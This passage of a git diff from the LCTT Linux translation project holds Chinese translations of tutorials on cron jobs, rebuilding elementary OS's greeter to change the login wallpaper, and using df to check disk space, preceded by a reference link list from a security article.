[3]: https://opensource.com/sites/default/files/uploads/kali-tools.png "Kali's tools"
[4]: https://creativecommons.org/licenses/by-sa/4.0/
[5]: https://wpscan.com/wordpress-security-scanner
[6]: https://www.redhat.com/sysadmin/using-nmap-harden-systems
[7]: https://opensource.com/sites/default/files/uploads/nmap-scan.png "Nmap scan"
[8]: https://opensource.com/sites/default/files/uploads/nmap-port80.png "Nmap scan of port 80"
[9]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf%5D(https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
[10]: https://www.redhat.com/sysadmin/how-red-hat-insights
[11]: https://en.wikipedia.org/wiki/Armitage_(computing)
[12]: https://access.redhat.com/security
[13]: https://www.redhat.com/en/blog/channel/security
[14]: https://www.nist.gov/cybersecurity

View File

@ -3,16 +3,16 @@
[#]: author: (Seth Kenlon https://opensource.com/users/seth)
[#]: collector: (lujun9972)
[#]: translator: (perfiffer)
[#]: reviewer: ( )
[#]: reviewer: (turbokernel)
[#]: publisher: ( )
[#]: url: ( )
在 Linux 上怎么使用 cron 定时器
如何在 Linux 上使用 cron 定时器
======
cron 定时器是一个可以按照计划自动运行命令的工具。
![Cron 表达式][1]
cron定时器是一个可以按照计划自动运行命令的工具。这个定时器作业被叫做 cronjob它被创建在 crontab 文件中。这是用户自动操作电脑的最简单也是最古老的方法。
cron 定时器是一个可以按照计划自动运行命令的工具。定时器作业称为 cronjob创建于 crontab 文件中。这是用户自动操作电脑的最简单也是最古老的方法。
### 创建一个 cronjob
@ -22,7 +22,7 @@ cron定时器是一个可以按照计划自动运行命令的工具。这个定
`$ crontab -e`
```
会使用默认的文本编辑器打开 crontab。要显示设置文本编辑器,请使用 `EDITOR` [环境变量][1]
将使用默认的文本编辑器打开 crontab。如需指定文本编辑器,请使用 `EDITOR` [环境变量][1]
```
`$ EDITOR=nano crontab -e`
@ -30,7 +30,7 @@ cron定时器是一个可以按照计划自动运行命令的工具。这个定
### Cron 语法
调度一个 cronjob你需要提供给计算机你想要执行的命令然后提供一个 cron 表达式。cron 表达式在命令调度时运行:
如需调度一个 cronjob你需要提供给计算机你想要执行的命令然后提供一个 cron 表达式。cron 表达式在命令调度时运行:
* minute (0 到 59)
@ -58,7 +58,7 @@ cron定时器是一个可以按照计划自动运行命令的工具。这个定
### 简写语法
现代的 cron 实现接收简化的宏,而不是 cron 表达式:
现代的 cron 支持简化的宏,而不是 cron 表达式:
* `@hourly` 在每天的每小时的 0 分运行
@ -84,11 +84,11 @@ cron定时器是一个可以按照计划自动运行命令的工具。这个定
`$ EDITOR=nano crontab -e`
```
停止一个正在运行的作业,可以[使用标准的Linux进程命令][3]来停止一个正在运行的进程。
如需停止一个正在运行的作业,可以[使用标准的Linux进程命令][3]来停止一个正在运行的进程。
### 它是自动的
一旦你编写完 crontab保存了文件并且退出了编辑器。你的 cronjob 就已经被调度了,剩下的工作都 cron 完成。
一旦你编写完 crontab保存了文件并且退出了编辑器。你的 cronjob 就已经被调度了,剩下的工作都交给 cron 完成。
--------------------------------------------------------------------------------
@ -97,7 +97,7 @@ via: https://opensource.com/article/21/7/cron-linux
作者:[Seth Kenlon][a]
选题:[lujun9972][b]
译者:[perfiffer](https://github.com/perfiffer)
校对:[校对者ID](https://github.com/校对者ID)
校对:[turbokernel](https://github.com/turbokernel)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

View File

@ -0,0 +1,130 @@
[#]: subject: (How to Change Lock and Login Screen Wallpaper in elementary OS)
[#]: via: (https://www.debugpoint.com/2021/07/change-lock-login-screen-background-elementary-os/)
[#]: author: (Arindam https://www.debugpoint.com/author/admin1/)
[#]: collector: (lujun9972)
[#]: translator: (geekpi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
如何在 elementary OS 中改变锁定和登录屏幕的壁纸
======
本教程解释了在 elementary OS 中改变锁定和登录屏幕背景的步骤。这将取代默认的灰色背景。
在 elementary OS 中改变锁屏或登录屏背景的灰色默认壁纸是有点困难的。典型的用图像文件的路径改变 greeter 配置是行不通的。
不幸的是,这不是一个更简单的解决方案,因为灰色背景是一个图像文件,它的数据在 greeter 中是硬编码的,需要用新的图像重新编译才能使其发挥作用。
下面是方法。
![Lock / Login screen background elementary OS \(Odin\)][1]
### 改变 elementary OS 锁定和登录屏幕背景
* 在 elementary OS 中打开一个终端。
* 为 [greeter包][2]安装 git 和以下依赖项。
```
sudo apt install git
```
```
sudo apt install -y gnome-settings-daemon libaccountsservice-dev libgdk-pixbuf2.0-dev libgranite-dev libgtk-3-dev libhandy-1-dev liblightdm-gobject-1-dev libmutter-6-dev libwingpanel-dev libx11-dev meson valac
```
* 进入临时的 /tmp 目录,从 GitHub 克隆最新的 greeter 主分支。
```
cd /tmp
git clone https://github.com/elementary/greeter.git
```
* 克隆完成后,在文件管理器中打开路径 `/tmp/greeter/data`
* 初级操作系统使用一个 100×100px 的 PNG 文件作为登录屏幕/锁屏的默认背景。该图像是平铺的,给人一种灰色背景的感觉。
* 用 `texture.png` 重命名你想要的墙纸图像,并在路径中覆盖以下文件。
![gray background is created using this file][3]
```
/tmp/greeter/data/texture.png
```
* 在文本编辑器中打开文件 `/tmp/greeter/compositor/SystemBackground.vala`,并替换下面一行:
![change the path of image][4]
```
resource:///io/elementary/desktop/gala/texture.png
```
为:
```
resource:///io/elementary/greeter/texture.png
```
* 保存该文件。
* 再次打开终端,使用以下命令构建 `greeter`
```
cd /tmp/greeter
meson _build --prefix=/usr
sudo ninja install -C _build
```
![building greeter][5]
* 如果你遇到任何构建错误,请在下面的评论中告诉我。你应该不会看到任何错误,因为我已经测试过了。
上面的命令完成后,你可以在测试模式下运行 lightdm 来测试登录屏:
```
lightdm --test-mode --debug
```
如果看起来不错,重新启动系统。而你应该在 elementary OS 的登录屏上看到你的墙纸。
这个指南应该可在 [elementary OS 6 Odin][7]、elementary OS 5 Juno 及以下版本中可用。
### 结束语
我希望本指南能帮助你在 elementary OS 中改变锁屏或登录屏的背景。老实说,在 2021 年改变登录屏的背景图像需要编译代码,这让我很吃惊。
如果你遇到错误,请在下面的评论栏里告诉我。
--------------------------------------------------------------------------------
via: https://www.debugpoint.com/2021/07/change-lock-login-screen-background-elementary-os/
作者:[Arindam][a]
选题:[lujun9972][b]
译者:[geekpi](https://github.com/geekpi)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://www.debugpoint.com/author/admin1/
[b]: https://github.com/lujun9972
[1]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/elementary-OS-Login-Screen-in-Odin-1024x768.jpg
[2]: https://github.com/elementary/greeter
[3]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/gray-background-is-created-using-this-file.jpg
[4]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/change-the-path-of-image-1024x450.jpg
[5]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/building-greeter.png
[7]: https://www.debugpoint.com/tag/elementary-os-6

View File

@ -2,22 +2,21 @@
[#]: via: (https://opensource.com/article/21/7/check-disk-space-linux-df)
[#]: author: (Seth Kenlon https://opensource.com/users/seth)
[#]: collector: (lujun9972)
[#]: translator: ( )
[#]: translator: (piaoshi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Use df to check free disk space on Linux
使用 df 命令查看 Linux 上的可用磁盘空间。
======
Find out how much Linux disk space you have left with the df command.
利用 df 命令查看 Linux 磁盘还剩多少空间。
![Free disk space][1]
Drive space isn't quite as precious as it was in the early days of computing, but no matter how much space you have, there's always the potential to run out. Computers need a little space just to operate, so it's important to check occasionally to ensure you haven't inadvertently used up literally _all_ the space available on your drive. In the Linux terminal, you can do that with the `df` command.
磁盘空间已经不像计算机早期那样珍贵,但无论你有多少磁盘空间,总有耗尽的可能。计算机需要一些磁盘空间才能启动运行,所以为了确保你没有在无意间用尽了所有的硬盘空间,偶尔检查一下是非常必要的。在 Linux 终端,你可以用 df 命令来做这件事。
The df command displays the amount of disk space available on the file system.
To make the output easy for you to read, you can use the `--human-readable` (or `-h` for short) option:
df 命令可以显示文件系统中可用的磁盘空间。
要想使输出结果易于阅读,你可以加上 --human-readable或其简写 -h选项
```
$ df --human-readable
@ -25,10 +24,9 @@ Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       1.0T  525G  500G  52% /
```
In this example, the computer's drive is 52% full, with 500 GB free for use.
Because Linux views its file system holistically across all mounted devices, the df command provides you details for every storage device attached to your computer. If you have lots of drives, then the output reflects that:
在这个例子中,计算机的磁盘已经用了 52%,还有 500 GB 可用空间。
由于 Linux 完整地看待所有挂载设备的文件系统df 命令会展示出连接到计算机上的每个存储设备的详细信息。如果你有很多磁盘,那么输出结果将会反映出来:
```
$ df --human-readable
@ -42,12 +40,11 @@ tmpfs            12G  848K   12G   1% /run
/dev/sdd1       3.7T  2.4T  1.3T  65% /tux
```
In this example, the `/home` directory of the computer is 87% full, with 191 GB free.
在这个例子中,计算机的 `/home` 目录已经用了 87%,剩下 191 GB 的可用空间。
### See total disk space available
If you do have a complex file system and would like to see the total space across all drives, use the `--total` option:
### 查看总的可用磁盘空间
如果你的文件系统确实很复杂,而你希望看到所有磁盘的总空间,可以使用 --total 选项:
```
$ df --human-readable --total
@ -62,11 +59,11 @@ tmpfs            12G  848K   12G   1% /run
total           6.6T  4.0T  2.5T  62% -
```
The final line of output provides the total space of the filesystem, total space used, total space available.
输出的最后一行展示了文件系统的总空间、已用总空间、可用总空间。
### See disk space usage
### 查看磁盘空间使用情况
To just get a summary of what's occupying the space on your drives, read our article about the [du command][2].
如果你想大概了解哪些文件占用了磁盘空间,请阅读我们关于 [du 命令][2] 的文章。
--------------------------------------------------------------------------------
@ -74,7 +71,7 @@ via: https://opensource.com/article/21/7/check-disk-space-linux-df
作者:[Seth Kenlon][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
译者:[piaoshi](https://github.com/piaoshi)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出